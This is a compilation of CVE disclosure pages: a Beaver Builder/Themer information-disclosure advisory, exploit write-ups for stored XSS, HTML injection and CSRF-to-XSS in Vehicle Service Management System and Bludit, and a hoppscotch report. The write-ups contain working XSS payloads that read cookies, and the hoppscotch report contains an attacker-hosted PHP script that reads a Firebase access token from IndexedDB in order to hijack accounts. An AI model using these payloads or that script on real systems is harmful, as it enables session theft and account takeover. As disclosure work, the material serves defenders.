In Beaver Themer, attackers can bypass conditional logic controls (for hiding content) when viewing the post archives. Exploitation requires that a Themer layout is applied to the archives, and that the post excerpt field is not set.

**Bottom line up front**

I discovered two sensitive information disclosure vulnerabilities that affect **Beaver Builder’s** element visibility and **Beaver Themer’s** conditional logic controls. These vulnerabilities are resolved in Beaver Builder 2.5.1!

These vulnerabilities allow ANY user to view content that is hidden via the visibility or conditional logic controls.

**NOTE:** these vulnerabilities have been resolved by the Beaver Builder team, however, 3rd parties that have built their own modules (ie post archive /search modules) must update their module’s code so that their modules do not leak sensitive information. The Beaver Builder team has notified many of the 3rd party developers. The Beaver Builder team has also posted a developer oriented article about this issue.

**The Issues**

Content protected with visibility or conditional logic controls is accessible:

*   to ANY user via the **WordPress REST API** _(CVE-2021-42748)_
*   if a Beaver Themer layout is applied, and the post excerpt field is not set, the protected content may be shown in _(CVE-2021-42749)_:
    *   **post archive**
    *   **search results**
    *   potentially in **Google Search**

**What is affected****Beaver Builder**

The **lite** (2.5.0.3 and older) and **professional** versions (2.5.0.3 and older) of the Beaver Builder page builder are affected. The lite version of Beaver Builder is installed on more than **200,000** websites.

**NOTE:** at the time of this writing, the Beaver Builder team hasn’t released an update for the lite version of Beaver Builder. They plan to release the Beaver Builder Lite update the week of 12/12/2021.

**Beaver Themer**

Beaver Themer is also affected. Beaver Themer is an add-on to the professional version of the Beaver Builder page builder which allows you to design every front-end area of WordPress.

The fix for the Beaver Themer vulnerability is included in Beaver Builder 2.5.1. Beaver Themer’s Conditional Logic feature is functionally separate from Beaver Builder’s visibility feature, but Beaver Themer uses a filter to hook into Beaver Builder’s codebase. The Beaver Builder 2.5.1 patch addresses both vulnerabilities.

**Timeline**

The Beaver Builder team was extremely responsive and professional as they developed a fix to remediate these vulnerabilities!

*   **Notification Sent to Beaver Builder**
    *   Sunday, 10/17/2021
*   **1st Response from Beaver Builder**
    *   Monday, 10/18/2021
*   **Patch Sent to Me for Testing**
    *   Tuesday, 11/16/2021
*   **Patch for Beaver Builder Professional Released**
    *   Thursday, 12/9/2021

**Vulnerability Summary**

The **lite** & **professional** versions of **Beaver Builder** include **visibility settings** which allow you to limit the visibility of content based on the user’s login status. You can even specify a WordPress capability (aka permission) that the user must have to see the content.

![](https://tekfused.com/wp-content/uploads/2021/10/image-12.png)

Beaver Builder Lite visibility settings

**Beaver Themer** extends the visibility controls by adding **conditional logic**. Conditional logic allows you to create complex if-then-this conditions to control the visibility of content. A simple example would be “show the content only IF the user is a customer.”

![](https://tekfused.com/wp-content/uploads/2021/10/Conditional-Logic-2.png)

Beaver Themer Conditional Logic

Visibility rules & conditional logic are checked on the server side before delivering the rendered page. As such, these features should be able to be used to control access to sensitive content on a page.

The Beaver Builder team gave the following explanation:

> The Post modules and the search module used the native WP the\_excerpt() which looks at the saved data in post\_content. The fix we implemented is to bypass that and use our layout functions. BB mirrors text based modules text in normal post content as a block so if you deactivate no text data or images are lost. So when WP looks up the excerpt it sees that data. As a result of that, it isn’t that we fixed a bug per se, more that we had to change default behavior.

**The Test Page**

The **first row** is hidden by using the visibility control “Display -> Logged In User” setting:

![](https://tekfused.com/wp-content/uploads/2021/10/image-1.png)

Row 1 settings

The **second row** is hidden by using the Conditional Logic setting (user role equals “Customer”):

![](https://tekfused.com/wp-content/uploads/2021/10/image-14.png)

Row 2 settings

The **third row** is visible to all users.

![](https://tekfused.com/wp-content/uploads/2021/10/image-4.png)

Row 3 settings

The page displays the “Content for the world!” text module for anonymous users as expected.

![](https://tekfused.com/wp-content/uploads/2021/10/image-8.png)

Test page seen as an unauthenticated user

**The Vulnerabilities****Content Exposed in the WordPress REST API (CVE-2021-42748)**

_This vulnerability affects **Beaver Builder** (Lite & Professional) and **Beaver Themer**._

I sent a request to the “Posts” WordPress REST API endpoint as an unauthenticated (ie not logged in) user, and observed the protected content.

![](https://tekfused.com/wp-content/uploads/2021/10/image-6.png)

Unathenticated REST API call to WordPress

**Content Exposed in the Post Archive (CVE-2021-42749)**

_This vulnerability affects **Beaver Themer**._

If:

*   A Beaver Themer layout is applied to the post/search archive
*   The post’s “Excerpt” field is not set
*   The protected content is at the top of the post’s content

The protected content will be displayed under the post’s title.

![](https://tekfused.com/wp-content/uploads/2021/10/image-9.png)

Post archive showing protected content

**Content Exposed in Google Search (CVE-2021-42749)**

_This vulnerability affects **Beaver Themer**._

Google lists the protected content in the Google SERP as it is displayed in the post category archive.

**RSS Feeds**

I tested the RSS feeds as an unauthenticated user, and they did **NOT** show the protected content.

**Conclusion**

The solution to these vulnerabilities is to update to Beaver Builder **2.5.1**!

The principle of least functionality applies here – if you do not utilize the REST API, disable it – at least for unauthenticated users.

CVE-2021-42749: Beaver Builder Vulnerabilities - Visibility and Conditional Logic (CVE-2021-42748 & CVE-2021-42749) - TEKFused

Laundry Booking Management System 1.0 (Latest) and previous versions are affected by a remote code execution (RCE) vulnerability in profile.php through the "image" parameter that can execute a webshell payload.

В тази папка няма файлове.Влезте в профила си, за да добавите файлове в тази папка

CVE-2021-45003: Laundry_Booking_Management_RCE – Google Диск

An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.

**Vehicle Service Management System - 'Multiple' File upload Leads to Stored Cross-Site Scripting**

Vehicle Service Management System - 'Multiple' File upload Leads to Stored Cross-Site Scripting

**Exploit Title: Vehicle Service Management System - 'Multiple' File upload Leads to Stored Cross-Site Scripting****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
*   https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting

**1\. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to My Account section http://localhost/vehicle\_service/admin/?page=user

**Code:**

<!DOCTYPE html\>
<html\>
<title\>Stored XSS</title\>
<body\>
<script\>
alert(document.cookie);
</script\>
</body\>
</html\>

3.  Save the above html code For Ex:XSS.html
4.  In My Account Section enter all the required details and browse the html file in Avatar.
5.  Click on update button.
6.  Open the avatar image in new tab.
7.  Malicious javascript code triggered.

**2\. Vehicle Service Management System - 'User List' (/admin/?page=user/manage\_user)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to User List section and click on Create New button.

**Code:**

<!DOCTYPE html\>
<html\>
<title\>Stored XSS</title\>
<body\>
<script\>
alert(document.cookie);
</script\>
</body\>
</html\>

3.  Save the above html code For Ex:XSS.html
4.  In Create New User Page enter all the required details and browse the html file in Avatar.
5.  Click on Save button.
6.  Open the avatar image in new tab.
7.  Malicious javascript code triggered.

**3\. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to Settings section http://localhost/vehicle\_service/admin/?page=system\_info

**Code:**

<!DOCTYPE html\>
<html\>
<title\>Stored XSS</title\>
<body\>
<script\>
alert(document.cookie);
</script\>
</body\>
</html\>

3.  Save the above html code For Ex:XSS.html
4.  In Settings Section enter all the required details and browse the html file in System Logo.
5.  Click on update button.
6.  Open the System Logo image in new tab.
7.  Malicious javascript code triggered.

**4\. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to Settings section http://localhost/vehicle\_service/admin/?page=system\_info

**Code:**

<!DOCTYPE html\>
<html\>
<title\>Stored XSS</title\>
<body\>
<script\>
alert(document.cookie);
</script\>
</body\>
</html\>

3.  Save the above html code For Ex:XSS.html
4.  In Settings Section enter all the required details and browse the html file in Website Cover.
5.  Click on update button.
6.  Open the Website Cover image in new tab.
7.  Malicious javascript code triggered.

CVE-2021-46078: GitHub - plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting: Vehicle Service Management System - 'Multiple' File upload Leads to Stored Cross-Site Scrip

A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.

**Vehicle Service Management System - 'Service List' Stored Cross Site Scripting (XSS)**

Vehicle Service Management System - 'Service List' Stored Cross Site Scripting (XSS)

**Exploit Title: Vehicle Service Management System - 'Service List' Stored Cross Site Scripting (XSS)****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss
*   https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS

**Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to Service List section and click on Create New button.
3.  Inject the payload "><script>alert(document.cookie)</script> in Service Name & Description input field.
4.  Click on Save button.
5.  Malicious javascript code triggered.

CVE-2021-46072: GitHub - plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS: Vehicle Service Management System - 'Service List' Stored Cross Site Scripting (XSS)

An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.

**Vehicle Service Management System - 'Multiple' File upload Leads to Html Injection**

Vehicle Service Management System - 'Multiple' File upload Leads to Html Injection

**Exploit Title: Vehicle Service Management System - 'Multiple' File upload Leads to Html Injection****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
*   https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection

**1\. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to My Account section http://localhost/vehicle\_service/admin/?page=user

**Code:**

<!DOCTYPE html\>
<html\>
<head\>
<title\>HTML marquee Tag</title\>
</head\>
<body\>
<marquee\>HTML INJECTION</marquee\>
</body\>
</html\>

3.  Save the above html code For Ex:Html Injection.html
4.  In My Account Section enter all the required details and browse the html file in Avatar.
5.  Click on update button.
6.  Open the avatar image in new tab.
7.  Html Injection is Executed.

**2\. Vehicle Service Management System - 'User List' (/admin/?page=user/manage\_user)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to User List section and click on Create New button.

**Code:**

<!DOCTYPE html\>
<html\>
<head\>
<title\>HTML marquee Tag</title\>
</head\>
<body\>
<marquee\>HTML INJECTION</marquee\>
</body\>
</html\>

3.  Save the above html code For Ex:Html Injection.html
4.  In Create New User Page enter all the required details and browse the html file in Avatar.
5.  Click on Save button.
6.  Open the avatar image in new tab.
7.  Html Injection is Executed.

**3\. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to Settings section http://localhost/vehicle\_service/admin/?page=system\_info

**Code:**

<!DOCTYPE html\>
<html\>
<head\>
<title\>HTML marquee Tag</title\>
</head\>
<body\>
<marquee\>HTML INJECTION</marquee\>
</body\>
</html\>

3.  Save the above html code For Ex:Html Injection.html
4.  In Settings Section enter all the required details and browse the html file in System Logo.
5.  Click on update button.
6.  Open the System Logo image in new tab.
7.  Html Injection is Executed.

**4\. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to Settings section http://localhost/vehicle\_service/admin/?page=system\_info

**Code:**

<!DOCTYPE html\>
<html\>
<head\>
<title\>HTML marquee Tag</title\>
</head\>
<body\>
<marquee\>HTML INJECTION</marquee\>
</body\>
</html\>

3.  Save the above html code For Ex:Html Injection.html
4.  In Settings Section enter all the required details and browse the html file in Website Cover.
5.  Click on update button.
6.  Open the Website Cover image in new tab.
7.  Html Injection is Executed.

CVE-2021-46079: GitHub - plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection: Vehicle Service Management System - 'Multiple' File upload Leads to Html Injection

A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel.

**Bludit 3.13.1 - TAGS Field Stored Cross Site Scripting (XSS)**

Bludit 3.13.1 - TAGS Field Stored Cross Site Scripting (XSS)

**Exploit Title: Bludit 3.13.1 - TAGS Field Stored Cross Site Scripting (XSS)****Date: 20/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.bludit.com****Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip****Version: <= 3.13.1****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/bludit-3-13-1-tags-field-stored-cross-site-scripting-xss
*   https://github.com/plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS

**Steps to Reproduce:**

1.  Login to the admin panel http://localhost/admin
2.  Navigate to New content section.
3.  Enter the title of the post Ex:test
4.  Click on the Options button.
5.  Navigate to Advanced tab and inject the payload "><script>alert("XSS")</script> in TAGS section.
6.  Click on Save button.
7.  Open the post(test).
8.  Malicious javascript code triggered.

CVE-2021-45744: GitHub - plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS: Bludit 3.13.1 - TAGS Field Stored Cross Site Scripting (XSS)

A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.

**Vehicle Service Management System - 'MyAccount' Stored Cross Site Scripting (XSS)**

Vehicle Service Management System - 'MyAccount' Stored Cross Site Scripting (XSS)

**Exploit Title: Vehicle Service Management System - 'MyAccount' Stored Cross Site Scripting (XSS)****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss/
*   https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS

**Steps to Reproduce:**

1.  Login to the admin panel http://localhost/vehicle\_service/admin
2.  Navigate to My Account section http://localhost/vehicle\_service/admin/?page=user
3.  Inject the payload "><script>alert(document.cookie)</script> in First Name & Last Name input field.
4.  Click on update button.
5.  Malicious javascript code triggered.

CVE-2021-46068: GitHub - plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS: Vehicle Service Management System - 'MyAccount' Stored Cross Site Scripting (XSS)

A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel.

**Bludit 3.13.1 - About Plugin Stored Cross Site Scripting (XSS)**

Bludit 3.13.1 - About Plugin Stored Cross Site Scripting (XSS)

**Exploit Title: Bludit 3.13.1 - About Plugin Stored Cross Site Scripting (XSS)****Date: 20/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.bludit.com****Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip****Version: <= 3.13.1****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/bludit-3-13-1-about-plugin-stored-cross-site-scripting-xss
*   https://github.com/plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS

**Steps to Reproduce:**

1.  Login to the admin panel http://localhost/admin
2.  Navigate to Themes section.
3.  Activate the Blog X theme.
4.  Navigate to plugins section.
5.  In About plugin click the Settings button.
6.  Inject the payload "><script>alert("XSS")</script> in About section.
7.  Click on Save button.
8.  Visit the site.
9.  Malicious javascript code triggered.

CVE-2021-45745: GitHub - plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS: Bludit 3.13.1 - About Plugin Stored Cross Site Scripting (XSS)

A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.

**Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Stored Cross Site Scripting (XSS)**

Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Stored Cross Site Scripting (XSS)

**Exploit Title: Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Stored Cross Site Scripting (XSS)****Date: 29/12/2021****Exploit Author: P.L.Sanu****Exploit Author Website: https://www.plsanu.com****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html****Version: <= 1.0****Tested on: Windows 10****CVE :****Google Dork: N/A****Reference:**

*   https://www.plsanu.com/vehicle-service-management-system-multiple-cross-site-request-forgery-csrf-leads-to-stored-cross-site-scripting-xss
*   https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS

**1\. Vehicle Service Management System - 'Mechanic List' (/admin/?page=mechanics)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Mechanic List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Full Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Mechanic List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**2\. Vehicle Service Management System - 'Service Requests' (/admin/?page=service\_requests)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Service Requests section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Owner Contact input field.
7.  Click on Save Request button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Service Requests section in Browser B (Firefox).
12.  Choose the newly created Service Requests and click on Action under View.
13.  Malicious javascript code triggered.

**3\. Vehicle Service Management System - 'Category List' (/admin/?page=maintenance/category)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Category List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Category Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Category List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**4\. Vehicle Service Management System - 'Service List' (/admin/?page=maintenance/services)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Service List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in Service Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Service List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**5\. Vehicle Service Management System - 'User List' (/admin/?page=user/list)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the User List section and click on Create New button.
6.  Inject the payload "><script>alert(document.cookie)</script> in First Name input field.
7.  Click on Save button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the User List section in Browser B (Firefox).
12.  Malicious javascript code triggered.

**6\. Vehicle Service Management System - 'Settings' (/admin/?page=system\_info)****Steps to Reproduce:**

1.  Visit the admin panel http://localhost/vehicle\_service/admin
2.  Create two admin accounts.
3.  Login the Admin-1 account in Browser A (Chrome)
4.  Login the Admin-2 account in Browser B (Firefox)
5.  In Admin-1 account(Chrome) navigate to the Settings section.
6.  Inject the payload "><script>alert(document.cookie)</script> in System Name input field.
7.  Click on Update button.
8.  Capture the request in burpsuite and generate the CSRF Html File.
9.  Save the CSRF Html file For Ex: CSRF.html
10.  In Browser B (Firefox) browse the CSRF.html file.
11.  Navigate to the Settings section in Browser B (Firefox).
12.  Malicious javascript code triggered.

CVE-2021-46080: GitHub - plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS: Vehicle Service Management System - 'Multiple' Cross-Site Request Forgery (CSRF) Leads to Store

hoppscotch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor

**Description**

Steal authorization token via xss and hijack attack

**Proof of Concept**

Using this attack , attacker can hijack account by stealing authorization header . I see there is team based collaboration exists ,so one user can hack other user account using this bug .

**STEP**

First host bellow php file in your webserver

    // cors2.php
    <?php
        if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
            header('Access-Control-Allow-Origin: *');
            header('Access-Control-Allow-Methods: POST, GET, DELETE, PUT, PATCH, OPTIONS');
            header('Access-Control-Allow-Headers: *');
            header('Access-Control-Max-Age: 1728000');
            header('Content-Length: 0');
            header('Content-Type: text/plain');
            die();
        }
    
        header('Access-Control-Allow-Origin: *');
        //header('Content-Type: application/json');
         header('Content-Type: text/html');
        //header("Location: http://mysite.com/cors.php");
     //   $ret = [
       //     'result' => 'OK',
        //];
       // print json_encode($ret);
        //echo "chut\"'><img src=x onerror=alert(document.cookie)>";
        echo '<script>//alert();
    var dbs=window.indexedDB.open("firebaseLocalStorageDb",1);
    dbs.onsuccess = function(event) {
      db = event.target.result;
      var tt=db.transaction(["firebaseLocalStorage"]).objectStore("firebaseLocalStorage")
    var tt2=tt.getAllKeys();
    //console.log(tt2)
     tt2.onsuccess=function(yy){
      keyss=yy.target.result[0];//alert(keyss)
      var mm=tt.get(keyss);//console.log(mm)
     mm.onsuccess=function(kk){
     var xx=kk.target.result.value.stsTokenManager.accessToken
      alert(xx)
      }
      }
    };
    </script>
             ';
    ?>
    
    

Lets your webserver url is http://mysite.com/cors2.php  
Now login to you account and fetch above url and preview the request and see xss is executed and it will fetch authorization token .

**VIDEO POC**

https://drive.google.com/file/d/1JLFiL0S9YLYjPNleoTOoQZQOylDfXfwn/view?usp=sharing

**SUGGESTED FIX**

When you previewing as html then render it in sandbox , so that it cant acccess authorization token . Simply create a div element with sandbox attribute and render the response there .

**Impact**

Full account hijack by stealing Authorization token

Tag

#google